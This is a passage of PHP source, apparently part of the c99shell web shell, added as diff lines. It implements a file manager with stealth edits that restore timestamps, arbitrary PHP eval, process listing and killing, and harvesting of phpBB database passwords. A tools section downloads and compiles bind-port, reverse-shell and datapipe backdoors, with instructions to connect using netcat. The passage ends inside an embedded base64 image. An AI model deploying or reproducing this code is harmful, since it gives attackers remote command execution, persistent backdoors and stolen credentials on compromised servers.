    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") + { + $parsesort[1] = "d"; + $y = " | "; + $y .= " Desc "; + } + else + { + $y = " | "; + $y .= " Asc "; + } + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "1 ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "1 ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "1 [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = "1 [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "2 ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "Info ".$checkbox;} + else {$row[] = "Info | + Edit | + Download ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    + + + "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + + + -^^-"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo " + + + "; + } + echo "

    "; + echo ""; + } + } + if ($act == "tools") + { + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port al#ff0000y in use, select any other!
    ";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! + You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    + View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + } + } + } + if (!empty($dpsubmit)) + { + echo "Result of datapipe-running:
    "; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) + { + echo "Port already in use, select any other!
    "; + } + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to + ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! + You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    + View datapipe process
    ";} + } + echo "
    "; + } + } + ?> + Binding port:
    + Port: "> + Password: "> +
    + Back connection:
    + HOST: "> + Port: "> +
    + Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    + Datapipe:
    + HOST: "> + Local port: ">
    + Note: sources will be downloaded from remote server. + + Proses:

    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Ga bisa mengeksekusi \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = " | Desc";} + else {$y = " | Asc";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } + } + if ($act == "eval") + { + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "
    + + +

    + + Display in text-area
    "; + } + if ($act == "f") + { + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    + Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("Info","info"), + array("HTML","html"), + array("TXT","txt"), + array("Code","code"), + array("Session","phpsess"), + array("EXE","exe"), + array("SDB","sdb"), + array("IMG","img"), + array("INI","ini"), + array("Download","download"), + array("Notepad","notepad"), + array("Edit","edit") + ); + echo "Viewing file: [ ".$ext." format ] => ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information: + + + "; + if (!$win) + { + echo " + + +
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo " + +
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] + [Preview]
    Base64: +
    [Encode] + [+chunk] + [+chunk+quotes] + [Decode] +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    "; 
    +                $v = explode("|",$r); 
    +                echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:
    + +
    + Display in text-area +
    +
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo " "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
    + + +
    +
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } + } +} +#################### act !img END ############## +else +{ + @ob_clean(); + $images = array( + "0x99b"=> + "R0lGODlhYwAxAPcAAAAAAP///wD/AAD+AAD9AAD8AAD7AAD6AAD3AAD2AAD0AADzAADvAADrAADq + AADpAADoAADnAADmAADiAADfAADeAADdAADcAADbAADaAADXAADVAADUAADTAADSAADRAADQAADP + AADOAADNAADKAADJAADIAADGAADFAADEAADDAADCAADAAAC/AAC+AAC8AAC6AAC5AAC4AAC3AAC2 + AAC1AACzAACxAACwAACuAACtAACsAACrAACpAACnAACmAACjAACiAAChAACgAACfAACdAACcAACZ + AACXAACWAACVAACUAACTAACSAACRAACMAACLAACKAACJAACIAACHAACGAACFAACEAACCAACBAACA + AAB/AAB+AAB9AAB8AAB7AAB6AAB3AAB1AAB0AABzAAByAABxAABwAABvAABuAABtAABsAABrAABq + AABpAABoAABnAABmAABlAABjAABiAABhAABgAABfAABeAABdAABcAABbAABaAABZAABYAABXAABW + AABVAABUAABTAABSAABRAABQAABPAABOAABNAABMAABLAABKAABJAABIAABHAABGAABFAABEAABD + AABCAABBAABAAAA/AAA+AAA9AAA8AAA7AAA6AAA5AAA4AAA3AAA2AAA1AAA0AAAzAAAyAAAxAAAw + AAAvAAAuAAAtAAAsAAArAAAqAAApAAAoAAAnAAAmAAAlAAAkAAAjAAAiAAAhAAAgAAAfAAAeAAAd + AAAcAAAbAAAaAAAZAAAYAAAXAAAWAAAVAAAUAAATAAASAAARAAAQAAAPAAAOAAANAAAMAAALAAAK + AAAJAAAIAAAHAAAGAAAFAAAEAAADAAACAAABAP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAANYALAAAAABjADEA + AAj/AAEIBJBsIABkBotVW0ht2LRp0qT9igYN2jNezppp1KWRGTNcHj2CDHlr2TJlymyhTJasFkqU + JZcxa7bL2bOKviI+HEZtYbViBo8ZLGhwIFGBCAX+ZEhNWMRo0Xw9c5ZRl8mTt14qq8WSJa2uyGYh + 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 + 